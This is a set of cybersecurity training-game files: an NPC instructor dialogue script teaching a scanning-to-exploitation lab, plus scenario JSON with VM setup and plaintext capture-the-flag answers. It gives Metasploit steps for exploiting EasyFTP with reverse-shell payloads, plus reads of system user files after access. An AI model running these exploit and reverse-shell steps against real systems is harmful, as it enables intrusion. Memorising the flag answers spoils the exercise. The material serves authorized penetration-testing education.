Welcome to From Scanning to Exploitation, {player_name}. I'm your exploitation specialist instructor for this session.
This lab brings together everything you've learned so far - scanning, vulnerability research, and exploitation. You'll learn how to move from network scanning to identifying vulnerabilities, searching for exploits, and ultimately gaining control of target systems.
We'll use both Metasploit console and Armitage, a graphical interface that can automate parts of the hacking process.
Remember: this knowledge is for authorized penetration testing and defensive security only.
~ exploitation_mastery += 10
#influence_increased
Let me explain how this lab works. You'll find three key resources here:
First, there's a Lab Sheet Workstation in this room. This gives you access to detailed written instructions and exercises that complement our conversation. Use it to follow along with the material.
Second, in the VM lab room to the north, you'll find terminals to launch virtual machines. You'll work with a Kali Linux attacker machine, a Windows server, and a Linux server for hands-on exploitation practice.
Finally, there's a Flag Submission Terminal where you'll submit flags you capture during the exercises. These flags demonstrate that you've successfully completed the challenges.
You can talk to me anytime to explore exploitation concepts, get tips, or ask questions about the material. I'm here to help guide your learning.
Ready to get started? Feel free to ask me about any topic, or head to the lab sheet workstation and VM room when you're ready to begin the practical exercises.
-> exploitation_hub
=== exploitation_hub ===
What aspect of exploitation would you like to explore?
+ [Why combine scanning and exploitation?]
-> scanning_to_exploitation
+ [Scanning targets with Nmap]
-> nmap_scanning
+ [Metasploit database and scan import]
-> metasploit_database
+ [Running scans from within msfconsole]
-> msfconsole_scanning
+ [Searching for Metasploit exploits]
-> searching_exploits
+ [Launching Metasploit exploits]
-> launching_exploits
+ [Introduction to Armitage]
-> armitage_intro
+ [Using Armitage for automated hacking]
-> armitage_usage
+ [Vulnerability databases and research]
-> vulnerability_databases
+ [The Exploit Database and searchsploit]
-> exploit_db
+ [Show me the commands reference]
-> commands_reference
+ [Practical challenge tips]
-> challenge_tips
+ [I'm ready for the lab exercises]
-> ready_for_practice
+ [That's all for now]
#exit_conversation
-> exploitation_hub
=== scanning_to_exploitation ===
After gathering information about a target through footprinting and scanning, you need to know what attacks will work.
~ instructor_rapport += 5
#influence_increased
The key questions are: Where will you find vulnerability information? How will you use that information to launch an attack? How can security professionals use this to test system security?
Once you know the operating system and software running on a system, you can refer to your own knowledge of known vulnerabilities, or search online databases for more extensive information.
+ [What makes a target exploitable?]
A target is exploitable when it's running vulnerable software that you have an exploit for.
For example, if a target is running an old version of Windows with known vulnerabilities, there are numerous exploits that could give you full control of the system.
The scanning phase reveals what's running. The vulnerability research phase identifies what's vulnerable. The exploitation phase is when you actually attack.
~ instructor_rapport += 5
#influence_increased
+ [How do I know what attacks will work?]
This is where vulnerability databases and exploit frameworks like Metasploit come in.
After scanning reveals "Windows 2000 with EasyFTP 1.7.0.11," you can search for known vulnerabilities in those specific versions.
Metasploit has over a thousand exploits built in. You can search them by platform, service name, or CVE number.
We'll also look at external databases like CVE Details, NVD, and Exploit DB.
~ instructor_rapport += 5
#influence_increased
- -> exploitation_hub
=== nmap_scanning ===
The first step is thorough scanning to identify your targets and what they're running.
~ instructor_rapport += 5
#influence_increased
For this lab, you'll scan your network to find two vulnerable servers - one Linux and one Windows.
A comprehensive scan would be: nmap -sV 10.X.X.2-3
Where X.X are the second and third octets of your Kali VM's IP address.
+ [What should I look for in the scan results?]
Pay attention to several key pieces of information:
First, the IP addresses - which host is Linux and which is Windows?
Second, what services are running - HTTP, FTP, SSH, IRC?
Third, and most importantly, what specific software versions are running. For example: "vsftpd 2.3.4" or "EasyFTP 1.7.0.11"
Those specific version numbers are critical for finding applicable exploits.
~ instructor_rapport += 5
#influence_increased
+ [What if the scan takes too long?]
Windows scans can take several minutes to complete - this is normal.
If you want faster results, you can skip OS detection or scan fewer ports.
However, for thorough penetration testing, patience is important. You don't want to miss a vulnerable service on an unusual port.
~ instructor_rapport += 5
#influence_increased
+ [What if nmap shows ftp with a question mark?]
If you see "ftp?" in the results, it means Nmap isn't confident about the service identification.
This can happen if the service is slow to respond or behaving unusually.
Try restarting the Windows server and scanning again. The service should respond properly after a fresh start.
~ instructor_rapport += 5
#influence_increased
- -> exploitation_hub
=== metasploit_database ===
Metasploit includes a PostgreSQL database that stores information about hosts, services, and vulnerabilities.
~ instructor_rapport += 5
#influence_increased
This database integration is extremely powerful - it lets you import scan results and automatically target vulnerable services.
Before using the database, you need to initialize it and start PostgreSQL.
+ [How do I initialize the Metasploit database?]
First, reinitialize the database: sudo msfdb reinit
Then start PostgreSQL: sudo service postgresql start
These commands set up the database that Metasploit will use to store scan results and track compromised hosts.
You only need to do this once per session, or after restarting your Kali VM.
~ instructor_rapport += 5
#influence_increased
+ [How do I import Nmap scan results?]
If you've saved Nmap results in XML format, you can import them:
From msfconsole, run: db_import scan_output.xml
Metasploit will parse the XML and populate the database with host and service information.
You can then query this data with commands like "hosts" and "services"
~ instructor_rapport += 5
#influence_increased
+ [What can I do with the database?]
Once data is in the database, you can query it intelligently:
"hosts" shows all discovered hosts and their operating systems.
"services" shows all discovered services across all hosts.
"services -p 21" shows only services on port 21 (FTP).
"services -p 21 -R" does the same AND automatically sets RHOSTS to target those services!
This integration makes targeting much more efficient.
~ instructor_rapport += 5
#influence_increased
- -> exploitation_hub
=== msfconsole_scanning ===
You can run scans directly from within msfconsole - you don't always need a separate terminal.
~ instructor_rapport += 5
#influence_increased
Msfconsole can run Bash commands, so you can run Nmap directly: msf > nmap -O -sV TARGET
Even better, you can use db_nmap which scans AND automatically imports results into the database.
+ [What's the difference between nmap and db_nmap?]
When you run "nmap" from msfconsole, it just executes Nmap normally. You'd need to manually import the results.
When you run "db_nmap", it does the same scan BUT automatically imports results into the Metasploit database.
For example: msf > db_nmap -O -sV -p 1-65535 TARGET
This scans all ports with OS and version detection, and the results are immediately available via "hosts" and "services"
~ instructor_rapport += 5
#influence_increased
+ [Does Metasploit have its own scanners?]
Yes! Metasploit has various port scanning modules, though they're not as feature-complete as Nmap.
You can see them with: use auxiliary/scanner/portscan/ (then press TAB)
For a basic TCP connect scan: use auxiliary/scanner/portscan/tcp
These modules integrate directly with the database and can use multiple threads for faster scanning.
~ instructor_rapport += 5
#influence_increased
+ [How do I use Metasploit's port scanner?]
First, select the module: use auxiliary/scanner/portscan/tcp
Set the target: set RHOSTS TARGET_IP
Optionally speed it up: set THREADS 10
Then run it: run
Results are automatically stored in the database. You can verify with the "services" command.
~ instructor_rapport += 5
#influence_increased
- -> exploitation_hub
=== searching_exploits ===
Metasploit's search command is incredibly powerful for finding relevant exploits.
~ instructor_rapport += 5
#influence_increased
You can search by platform, service name, CVE number, exploit type, and more.
The basic syntax is: search <keyword>
But you can be much more specific with search operators.
+ [What search operators are available?]
Here are the main search operators:
type: - Specify module type (exploit, auxiliary, post)
platform: - Specify platform (Windows, Linux, etc.)
cve: - Search by CVE number
name: - Search module names
For example: search type:exploit platform:Windows
Or: search type:exploit cve:2003-0352
~ instructor_rapport += 5
#influence_increased
+ [How do I search for specific software?]
Simply include the software name in the search:
search easyftp
search vsftpd
search unreal
Metasploit will search module names, descriptions, and references for matches.
Look through the results for modules that match your target's version number.
~ instructor_rapport += 5
#influence_increased
+ [Give me some search examples]
Sure! Here are useful searches:
search type:exploit platform:linux
search type:exploit cve:2018
search buffer overflow
search type:exploit platform:Windows XP
search IRC (to find IRC server exploits)
Once you find a promising module, use "info exploit/path/to/module" to learn more about it.
~ instructor_rapport += 5
#influence_increased
- -> exploitation_hub
=== launching_exploits ===
Once you've identified the right exploit module, launching it follows a standard workflow.
~ instructor_rapport += 5
#influence_increased
The process is: select the module, configure options, choose a payload, and launch the attack.
Let's walk through a typical exploitation scenario.
+ [Walk me through exploiting EasyFTP]
Let me guide you through the complete process:
First, select the exploit: use exploit/windows/ftp/easyftp_cwd_fixret
Check required options: show options
Set the target: set RHOST TARGET_IP
Choose a payload: set PAYLOAD windows/shell/reverse_tcp
Set your IP for the reverse shell: set LHOST YOUR_KALI_IP
Optionally check if it's vulnerable: check (though most don't support this)
Launch the attack: exploit
If successful, you'll get a shell on the target!
~ instructor_rapport += 5
#influence_increased
+ [What payloads should I use?]
The payload depends on what you want to achieve and what the exploit supports.
You can see compatible payloads with: show payloads
For Windows targets, common choices include:
windows/shell/reverse_tcp - Basic command shell
windows/meterpreter/reverse_tcp - Powerful Meterpreter shell with advanced features
For Linux targets:
cmd/unix/reverse - Simple Unix shell
linux/x86/meterpreter/reverse_tcp - Meterpreter for Linux
~ instructor_rapport += 5
#influence_increased
+ [What if the exploit doesn't work?]
First, run "show options" and verify all settings, especially IP addresses.
Make sure you're using the correct IP - YOUR Kali IP for LHOST, and the TARGET IP for RHOST.
Try restarting the target VM - sometimes services crash after failed exploit attempts.
Verify the target is actually running the vulnerable software at that version.
Some exploits are unreliable and may need multiple attempts.
~ instructor_rapport += 5
#influence_increased
+ [What can I do once I have a shell?]
With a Windows shell, you can run commands like:
dir C:\ (list files)
net user (list user accounts)
whoami (check your privileges)
For Linux shells:
ls -la (list files)
cat /etc/passwd (view user accounts)
whoami (check current user)
We'll cover post-exploitation in more depth in later labs.
~ instructor_rapport += 5
#influence_increased
- -> exploitation_hub
=== armitage_intro ===
Armitage is a free and open source graphical interface for Metasploit with powerful automation features.
~ instructor_rapport += 5
#influence_increased
It was created to make Metasploit more accessible and to automate repetitive tasks in penetration testing.
Armitage can scan networks, automatically suggest attacks, and visualize compromised systems.
+ [How is Armitage different from msfconsole?]
Msfconsole is a command-line interface that gives you complete control and flexibility.
Armitage provides a graphical interface that visualizes the network and automates finding attacks.
Armitage can look at scan results and automatically suggest which exploits might work against each target.
It's particularly useful for beginners or when you want to quickly test multiple targets.
However, experienced penetration testers often prefer msfconsole for its power and speed.
~ instructor_rapport += 5
#influence_increased
+ [How do I start Armitage?]
First, initialize the Metasploit database if you haven't already:
sudo msfdb reinit
sudo service postgresql start
Then start Armitage: armitage &
The & runs it in the background so you can continue using your terminal.
Leave the connection options as default and click "Connect"
If prompted, allow Armitage to start the Metasploit RPC server.
~ instructor_rapport += 5
#influence_increased
+ [What does the Armitage interface show?]
Armitage displays a visual network map showing discovered hosts.
Each host is represented by an icon - the icon shows the detected operating system.
Compromised systems are shown in red with lightning bolts.
You can right-click hosts to see suggested attacks, launch exploits, or interact with shells.
The interface makes it easy to see the big picture of a network and what you've compromised.
~ instructor_rapport += 5
#influence_increased
- -> exploitation_hub
=== armitage_usage ===
Let me walk you through using Armitage to scan and exploit targets.
~ instructor_rapport += 5
#influence_increased
Armitage integrates scanning, vulnerability analysis, and exploitation into a streamlined workflow.
+ [How do I scan with Armitage?]
Click the "Hosts" menu, select "Nmap Scan", then choose a scan type.
"Quick Scan (OS detect)" is a good starting point: nmap -O -sV TARGET
Enter the IP address to scan and Armitage will run Nmap.
Results are automatically imported into the Metasploit database and displayed visually.
Any previously scanned hosts in the database will also appear automatically.
~ instructor_rapport += 5
#influence_increased
+ [How does Armitage suggest attacks?]
Armitage analyzes the operating system and services detected on each host.
First, set the exploit rank to include more options: Armitage menu → Set Exploit Rank → Poor
Then click: Attacks → Find attacks
Armitage will match detected services to available exploits in Metasploit.
Right-click a host and select "Attack" to see suggested exploits categorized by service.
~ instructor_rapport += 5
#influence_increased
+ [How do I launch an attack in Armitage?]
Right-click the target host and select "Attack"
Navigate through the menu to find the exploit - for example: ftp → easyftp_cwd_fixret
Click "Launch" and Armitage will configure and run the exploit.
If successful, the host icon turns red showing it's compromised!
You can then right-click the compromised host to interact with shells or run post-exploitation modules.
~ instructor_rapport += 5
#influence_increased
+ [How do I interact with a compromised system?]
Right-click the compromised (red) host.
Look for "Meterpreter 1" or "Shell 1" depending on the payload used.
Click "Interact" → "Command shell" to open a terminal.
You can now run commands like "dir" on Windows or "ls" on Linux.
Armitage also has menu options for common post-exploitation tasks.
~ instructor_rapport += 5
#influence_increased
- -> exploitation_hub
=== vulnerability_databases ===
Beyond Metasploit, there are numerous online vulnerability databases you should know about.
~ instructor_rapport += 5
#influence_increased
These databases provide detailed information about known vulnerabilities, even if exploits aren't publicly available.
Different databases have different focuses and information, so it's worth checking multiple sources.
+ [What are the main vulnerability databases?]
Here are the most important ones:
CVE Details (cvedetails.com) - Searchable CVE database with statistics and visualizations.
NVD (nvd.nist.gov/vuln/search) - National Vulnerability Database, the official US government repository.
SecurityFocus (securityfocus.com/bid) - Bugtraq ID database with discussion forums.
Packet Storm Security (packetstormsecurity.com) - Security tools, exploits, and advisories.
~ instructor_rapport += 5
#influence_increased
+ [What information do these databases provide?]
Vulnerability databases typically include:
CVE numbers - unique identifiers for each vulnerability.
Severity scores (CVSS) - numerical ratings of how serious the vulnerability is.
Affected versions - which specific software versions are vulnerable.
Technical descriptions of the vulnerability.
References to patches, advisories, and sometimes proof-of-concept code.
Information about whether exploits exist in the wild.
~ instructor_rapport += 5
#influence_increased
+ [Do all vulnerabilities have CVEs?]
No! This is an important point.
CVE and NVD list officially registered security vulnerabilities, but not all possible vulnerabilities are necessarily registered and assigned CVEs.
Sometimes researchers publish vulnerabilities before CVEs are assigned.
Some vendors have their own vulnerability identifiers.
Zero-day vulnerabilities (unknown to vendors) obviously won't have CVEs yet.
This is why checking multiple sources and forums is important.
~ instructor_rapport += 5
#influence_increased
- -> exploitation_hub
=== exploit_db ===
The Exploit Database (Exploit-DB) is an extensive database focused on vulnerabilities with working exploits.
~ instructor_rapport += 5
#influence_increased
It's maintained by Offensive Security (the makers of Kali Linux) and contains thousands of exploits with source code.
Kali Linux includes a local copy of the entire database!
+ [How do I search Exploit-DB online?]
Visit exploit-db.com and use their search function.
You can search by software name, version, platform, or exploit type.
Each exploit listing includes the source code, often in Python, C, PHP, or other languages.
The database also categorizes exploits by type: remote, local, web application, DoS, etc.
~ instructor_rapport += 5
#influence_increased
+ [How do I use the local Exploit-DB copy?]
On Kali Linux, exploits are stored in /usr/share/exploitdb/
They're organized by platform: windows, linux, osx, etc.
You can list Windows exploits with: find /usr/share/exploitdb/exploits/windows then pipe to less
There's also an index file with descriptions: less /usr/share/exploitdb/files_exploits.csv
~ instructor_rapport += 5
#influence_increased
+ [What's searchsploit?]
Searchsploit is a command-line tool for searching the local Exploit-DB copy.
It's much faster and more convenient than manually searching files.
Basic usage: searchsploit easyftp
You can also use grep on the CSV file: grep -i "EasyFTP" /usr/share/exploitdb/files_exploits.csv
To download an exploit to your current directory: searchsploit -m windows/remote/11539.py
~ instructor_rapport += 5
#influence_increased
+ [How do I use standalone exploits from Exploit-DB?]
Standalone exploits often require some manual setup:
You might need to edit the source code to set the target IP address.
Some exploits require compilation (C/C++ code).
Python exploits might need specific library dependencies.
Read the exploit code comments carefully - they usually explain how to use it.
Always understand what an exploit does before running it!
~ instructor_rapport += 5
#influence_increased
- -> exploitation_hub
=== commands_reference ===
Let me provide a comprehensive commands reference for this lab.
~ instructor_rapport += 5
#influence_increased
**Initial Scanning:**
nmap -sV 10.X.X.2-3 (scan for two servers)
nmap -O -sV -p 1-65535 TARGET (comprehensive scan)
**Metasploit Database Setup:**
sudo msfdb reinit
sudo service postgresql start
msfconsole (start Metasploit console)
+ [Show me scanning from msfconsole]
**Scanning from Msfconsole:**
msf > nmap -O -sV TARGET
msf > db_nmap -O -sV -p 1-65535 TARGET
msf > db_import scan_output.xml
**Database Queries:**
msf > hosts (show all hosts)
msf > services (show all services)
msf > services -p 21 (show services on port 21)
msf > services -p 21 -R (and set RHOSTS)
~ instructor_rapport += 3
#influence_increased
+ [Show me Metasploit scanning modules]
**Metasploit Port Scanners:**
msf > use auxiliary/scanner/portscan/ (TAB to see options)
msf > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set RHOSTS TARGET
msf auxiliary(tcp) > set THREADS 10
msf auxiliary(tcp) > run
msf auxiliary(tcp) > services
msf auxiliary(tcp) > back
~ instructor_rapport += 3
#influence_increased
+ [Show me searching for exploits]
**Searching for Exploits:**
msf > help search
msf > search easyftp
msf > search type:exploit platform:Windows
msf > search type:exploit cve:2003-0352
msf > search buffer overflow
msf > search type:exploit platform:linux
msf > info exploit/windows/ftp/easyftp_cwd_fixret
~ instructor_rapport += 3
#influence_increased
+ [Show me launching exploits]
**Launching Exploits:**
msf > use exploit/windows/ftp/easyftp_cwd_fixret
msf exploit(...) > show options
msf exploit(...) > set RHOST TARGET_IP
msf exploit(...) > show payloads
msf exploit(...) > set PAYLOAD windows/shell/reverse_tcp
msf exploit(...) > set LHOST YOUR_KALI_IP
msf exploit(...) > check (if supported)
msf exploit(...) > exploit
~ instructor_rapport += 3
#influence_increased
+ [Show me post-exploitation commands]
**Post-Exploitation Commands (Windows):**
dir C:\ (list files)
net user (list user accounts)
whoami (check privileges)
type C:\path\to\flag.txt (read file)
**Post-Exploitation Commands (Linux):**
ls -la (list files)
cat /etc/passwd (view user accounts)
whoami (current user)
cat flag (read flag file)
~ instructor_rapport += 3
#influence_increased
+ [Show me Armitage commands]
**Armitage Setup:**
sudo msfdb reinit
sudo service postgresql start
armitage &
**Armitage Workflow:**
1. Hosts → Nmap Scan → Quick Scan (OS detect)
2. Armitage → Set Exploit Rank → Poor
3. Attacks → Find attacks
4. Right-click host → Attack → select exploit → Launch
5. Right-click compromised host → Interact → Command shell
~ instructor_rapport += 3
#influence_increased
+ [Show me Exploit-DB commands]
**Exploit Database:**
find /usr/share/exploitdb/exploits/windows then pipe to less
less /usr/share/exploitdb/files_exploits.csv
grep -i "EasyFTP" /usr/share/exploitdb/files_exploits.csv
searchsploit easyftp
searchsploit -m windows/remote/11539.py
~ instructor_rapport += 3
#influence_increased
- -> exploitation_hub
=== challenge_tips ===
Let me give you practical tips for succeeding in the exploitation challenges.
~ instructor_rapport += 5
#influence_increased
**Finding Vulnerable Services:**
Start with a comprehensive scan: nmap -sV -p 1-65535 TARGET
Pay close attention to service versions - specific version numbers are key to finding exploits.
Import results into Metasploit for easier targeting: db_nmap -sV TARGET
+ [Tips for exploiting the Windows server?]
The Windows server is running EasyFTP with a known vulnerability.
Search for it: search easyftp
Look for the module ending in "cwd_fixret"
Use a reverse shell payload since it's more reliable: windows/shell/reverse_tcp
Make sure to set LHOST to YOUR Kali IP (the host-only network address).
If the exploit fails, restart the Windows VM and try again.
~ instructor_rapport += 5
#influence_increased
+ [Tips for exploiting the Linux server?]
The Linux server has multiple potentially vulnerable services.
Scan all ports to find everything running: nmap -sV -p- TARGET
Look for services like vsftpd, IRC, or other network services.
Search Metasploit for exploits matching those services.
Remember to use a Unix reverse shell payload: cmd/unix/reverse
Some Linux exploits are more reliable than others - you may need to try a few.
~ instructor_rapport += 5
#influence_increased
+ [Tips for using Armitage?]
Armitage is great for beginners because it suggests attacks automatically.
Make sure you set the exploit rank to "Poor" or you'll miss some exploits.
Don't just click the first suggested attack - read the module info to understand what it does.
Armitage may prompt for your Kali IP address - use the host-only network IP, not 127.0.0.1.
If Armitage seems to hang, check the console tab at the bottom for error messages.
~ instructor_rapport += 5
#influence_increased
+ [General troubleshooting advice?]
Always verify your IP addresses with "show options" before running exploits.
RHOST should be the TARGET's IP. LHOST should be YOUR Kali IP.
If services stop responding, restart the target VM - exploits often crash vulnerable services.
After successfully exploiting a service once, you'll need to restart the VM to exploit it again.
Be patient - some exploits take time to establish connections.
~ instructor_rapport += 5
#influence_increased
+ [Where are the flags?]
For the Windows server, look on a user's Desktop.
Navigate with: cd C:\Users or cd C:\Documents and Settings
List directories with: dir
Read flag files with: type flag.txt
For the Linux server, flags are typically in user home directories.
Navigate with: cd /home
List directories with: ls -la
Read flags with: cat flag
~ instructor_rapport += 5
#influence_increased
- -> exploitation_hub
=== ready_for_practice ===
Excellent! You're ready to start practical exploitation.
~ instructor_rapport += 10
#influence_increased
~ exploitation_mastery += 10
#influence_increased
You now understand how to move from scanning to exploitation - the core of penetration testing.
Remember: these techniques are powerful. Use them only for authorized security testing and defensive purposes.
In this lab, you'll scan two servers, identify vulnerable services, and exploit them to gain access.
+ [Any final advice before I start?]
Be methodical. Scan thoroughly, document what you find, research vulnerabilities, then exploit.
Don't rush. Take time to understand what each exploit does and why it works.
If something doesn't work, check your settings, restart the target, and try again.
Try both msfconsole and Armitage to see which you prefer.
Most importantly: always verify you're targeting the right system and have authorization!
Good luck, Agent {player_name}. Time to put your skills to the test.
~ instructor_rapport += 10
#influence_increased
- -> exploitation_hub
-> exploitation_hub

1
scenarios/lab_exploitation/ink/instructor.json Normal file
View File

File diff suppressed because one or more lines are too long

38
scenarios/lab_exploitation/mission.json Normal file
View File

@@ -0,0 +1,38 @@
{
"display_name": "From Scanning to Exploitation",
"description": "Learn how to move from network scanning to identifying vulnerabilities, searching for exploits, and ultimately gaining control of target systems. Your exploitation specialist instructor will guide you through Metasploit, Armitage, and vulnerability research before you practice in a hands-on VM lab environment.",
"difficulty_level": 1,
"secgen_scenario": "labs/introducing_attacks/6_exploitation.xml",
"collection": "vm_labs",
"cybok": [
{
"ka": "AB",
"topic": "Models",
"keywords": ["kill chains"]
},
{
"ka": "MAT",
"topic": "Malicious Activities by Malware",
"keywords": ["cyber kill chain"]
},
{
"ka": "SS",
"topic": "Categories of Vulnerabilities",
"keywords": ["CVEs and CWEs"]
},
{
"ka": "MAT",
"topic": "Attacks and exploitation",
"keywords": ["EXPLOITATION", "EXPLOITATION FRAMEWORKS"]
},
{
"ka": "SOIM",
"topic": "PENETRATION TESTING",
"keywords": [
"PENETRATION TESTING - SOFTWARE TOOLS",
"PENETRATION TESTING - ACTIVE PENETRATION"
]
}
]
}

179
scenarios/lab_exploitation/scenario.json.erb Normal file
View File

@@ -0,0 +1,179 @@
{
"scenario_brief": "Welcome to the From Scanning to Exploitation Lab! Your exploitation specialist instructor will guide you through Metasploit, Armitage, and vulnerability research. Complete the instruction and then practice your skills in the VM lab environment.",
"endGoal": "Complete the lab instruction with the exploitation specialist instructor, launch the VMs, and capture all available flags from the Windows and Linux servers to demonstrate your understanding of exploitation techniques.",
"startRoom": "instruction_room",
"startItemsInInventory": [],
"globalVariables": {
"player_name": "Agent 0x00",
"lab_instruction_complete": false,
"vm_launched": false,
"exploitation_mastery": 0
},
"objectives": [
{
"aimId": "complete_vm_lab",
"title": "Complete VM Lab Exercises",
"description": "Capture all flags from the Windows and Linux servers",
"status": "active",
"order": 0,
"tasks": [
{
"taskId": "submit_all_flags",
"title": "Submit all required flags from Windows and Linux servers",
"type": "submit_flags",
"targetFlags": ["windows_server-flag1", "linux_server-flag1"],
"targetCount": 2,
"currentCount": 0,
"showProgress": true,
"status": "active"
}
]
}
],
"player": {
"id": "player",
"displayName": "Agent 0x00",
"spriteSheet": "hacker",
"spriteTalk": "assets/characters/hacker-talk.png",
"spriteConfig": {
"idleFrameStart": 20,
"idleFrameEnd": 23
}
},
"rooms": {
"instruction_room": {
"type": "room_office",
"connections": {
"north": "vm_lab_room"
},
"locked": false,
"npcs": [
{
"id": "exploitation_specialist",
"displayName": "Exploitation Specialist",
"npcType": "person",
"position": { "x": 3.5, "y": 3.5 },
"spriteSheet": "hacker-red",
"spriteTalk": "assets/characters/hacker-red-talk.png",
"spriteConfig": {
"idleFrameStart": 20,
"idleFrameEnd": 23
},
"storyPath": "scenarios/lab_exploitation/ink/instructor.json",
"currentKnot": "start",
"timedConversation": {
"delay": 5000,
"targetKnot": "intro_timed"
},
"eventMappings": [
{
"eventPattern": "objective_aim_completed:complete_vm_lab",
"targetKnot": "flags_completed_congrats",
"conversationMode": "person-chat",
"autoTrigger": true,
"cooldown": 0
}
],
"itemsHeld": []
}
],
"objects": [
{
"type": "lab-workstation",
"id": "lab_workstation",
"name": "Lab Sheet Workstation",
"takeable": true,
"labUrl": "https://cliffe.github.io/HacktivityLabSheets/labs/introducing_attacks/6-exploitation/",
"observations": "A workstation for accessing the lab sheet with detailed instructions and exercises"
},
{
"type": "notes",
"name": "Lab Welcome Guide",
"takeable": true,
"readable": true,
"text": "Welcome to the From Scanning to Exploitation Lab!\n\nOBJECTIVES:\n1. Use the Lab Sheet Workstation to access detailed lab instructions\n2. Complete the lab sheet exercises\n3. Launch the VMs and practice exploitation techniques\n4. Capture all flags from the Windows and Linux servers\n\nThe exploitation specialist instructor is available if you need guidance.\n\nGood luck!",
"observations": "A guide to the lab structure and objectives"
},
{
"type": "notes",
"name": "VM Lab Instructions",
"takeable": true,
"readable": true,
"text": "VM Lab Practice Instructions:\n\n1. Launch the VMs in the VM Lab Room:\n - Kali VM Terminal: Your attacker machine with Metasploit and Armitage\n - Windows Server Terminal: Target for exploitation (EasyFTP vulnerability)\n - Linux Server Terminal: Target for exploitation (UnrealIRC vulnerability)\n\n2. Your objectives:\n - Scan both servers to identify vulnerable services\n - Use Metasploit to search for and launch exploits\n - Gain access to both systems and capture flags\n - Submit flags at the Flag Submission Terminal\n\n3. Submit flags at the Flag Submission Terminal in the VM Lab Room\n\nFlags to capture:\n- flag from Windows server - After exploiting EasyFTP vulnerability\n- flag from Linux server - After exploiting UnrealIRC vulnerability\n\nRemember what the instructor taught you about exploitation techniques!",
"observations": "Instructions for the VM lab exercises"
}
]
},
"vm_lab_room": {
"type": "room_office",
"connections": {
"south": "instruction_room"
},
"locked": false,
"objects": [
{
"type": "vm-launcher",
"id": "vm_launcher_kali",
"name": "Kali VM Terminal",
"takeable": false,
"observations": "Terminal providing access to the Kali Linux attacker machine with Metasploit and Armitage",
"hacktivityMode": <%= vm_context && vm_context['hacktivity_mode'] ? 'true' : 'false' %>,
"vm": <%= vm_object('from_scanning_to_exploitation', {
"id": 1,
"title": "kali",
"ip": "172.16.0.4",
"enable_console": true
}) %>
},
{
"type": "vm-launcher",
"id": "vm_launcher_windows_server",
"name": "Windows Server Terminal",
"takeable": false,
"observations": "Terminal providing access to the Windows server for exploitation practice",
"hacktivityMode": <%= vm_context && vm_context['hacktivity_mode'] ? 'true' : 'false' %>,
"vm": <%= vm_object('from_scanning_to_exploitation', {
"id": 2,
"title": "windows_server",
"ip": "172.16.0.2",
"enable_console": true
}) %>
},
{
"type": "vm-launcher",
"id": "vm_launcher_linux_server",
"name": "Linux Server Terminal",
"takeable": false,
"observations": "Terminal providing access to the Linux server for exploitation practice",
"hacktivityMode": <%= vm_context && vm_context['hacktivity_mode'] ? 'true' : 'false' %>,
"vm": <%= vm_object('from_scanning_to_exploitation', {
"id": 3,
"title": "linux_server",
"ip": "172.16.0.3",
"enable_console": true
}) %>
},
{
"type": "flag-station",
"id": "flag_station_lab",
"name": "Lab Flag Submission Terminal",
"takeable": false,
"observations": "Submit flags captured from the Windows and Linux servers here",
"acceptsVms": ["windows_server", "linux_server"],
"flags": [
"flag{exploitation_windows_success}",
"flag{exploitation_linux_success}"
],
"flagRewards": [
{
"type": "emit_event",
"event_name": "exploitation_flag_submitted",
"description": "Exploitation flag submitted - demonstrates exploitation skills"
}
]
}
]
}
}
}

657
scenarios/lab_feeling_blu/ink/instructor.ink Normal file
View File

@@ -0,0 +1,657 @@
// Feeling Blu Challenge - Web Security CTF Lab Sheet
// Based on HacktivityLabSheets: introducing_attacks/9_feeling_blu.md
// Author: Anatoliy Gorbenko, Z. Cliffe Schreuders, Andrew Scholey
// License: CC BY-SA 4.0
// Global persistent state
VAR instructor_rapport = 0
VAR ctf_mastery = 0
VAR challenge_mode = "guided" // "guided" or "ctf"
// Global variables (synced from scenario.json.erb)
VAR player_name = "Agent 0x00"
=== start ===
~ instructor_rapport = 0
~ ctf_mastery = 0
Welcome back, {player_name}. What would you like to discuss?
-> feeling_blu_hub
// ===========================================
// TIMED INTRO CONVERSATION (Game Start)
// ===========================================
=== intro_timed ===
~ instructor_rapport = 0
~ ctf_mastery = 0
Welcome to the "Feeling Blu" CTF Challenge, {player_name}. I'm your CTF Challenge Coordinator for this comprehensive Capture The Flag challenge.
This is your final test - a comprehensive challenge that brings together everything you've learned. You'll exploit a web server, gain access, escalate privileges, and hunt for flags. This simulates a real-world penetration test from start to finish.
Let me explain how this lab works. You'll find three key resources here:
First, there's a Lab Sheet Workstation in this room. This gives you access to detailed written instructions and exercises that complement our conversation. Use it to follow along with the material.
Second, in the VM lab room to the north, you'll find terminals to launch virtual machines. You'll work with both a Kali Linux attacker machine and a vulnerable web server for hands-on practice.
Finally, there's a Flag Submission Terminal where you'll submit flags you capture during the exercises. These flags demonstrate that you've successfully completed the challenges.
You can talk to me anytime to explore CTF concepts, get tips, or ask questions about the material. I'm here to help guide your learning.
Before we begin, you need to choose how you want to approach this challenge. Would you like guided mode with step-by-step instructions, or pure CTF mode with minimal guidance?
-> choose_path
// ===========================================
// MAIN HUB
// ===========================================
=== feeling_blu_hub ===
{challenge_mode == "ctf": -> ctf_mode_hub | -> guided_mode_hub}
=== choose_path ===
How do you want to tackle this CTF challenge?
+ [Pure CTF mode - minimal guidance, maximum challenge]
~ challenge_mode = "ctf"
~ ctf_mastery += 20
#influence_increased
Excellent choice! You'll get the full Capture The Flag experience.
I'll give you the tools and objectives, but you'll need to figure out the approach yourself.
Use everything you've learned: scanning, exploitation, privilege escalation, and persistence.
Only come back for hints if you're truly stuck. Good luck!
-> ctf_mode_hub
+ [Guided mode - walk me through the techniques]
~ challenge_mode = "guided"
~ instructor_rapport += 10
#influence_increased
A wise choice for learning! I'll guide you through each phase with explanations.
You'll learn web application exploitation, brute forcing, post-exploitation, and privilege escalation with structured guidance.
This approach ensures you understand not just how to exploit, but why each technique works.
-> guided_mode_hub
=== ctf_mode_hub ===
This is CTF mode - you're on your own! Here's what I can tell you:
Target: A web server running on your victim VM.
Objectives: Find multiple flags, gain shell access, escalate to root.
Tools available: Nmap, Dirb, Nikto, Metasploit, OWASP ZAP, and more.
+ [What tools should I start with?]
Think about the attack methodology: reconnaissance, scanning, exploitation, post-exploitation, privilege escalation.
Start by discovering what's running: Nmap for services, Dirb and Nikto for web enumeration.
Look for hidden files, admin panels, and leaked credentials.
~ instructor_rapport += 5
#influence_increased
+ [I'm stuck - give me a hint about reconnaissance]
-> ctf_recon_hints
+ [I'm stuck - give me a hint about exploitation]
-> ctf_exploit_hints
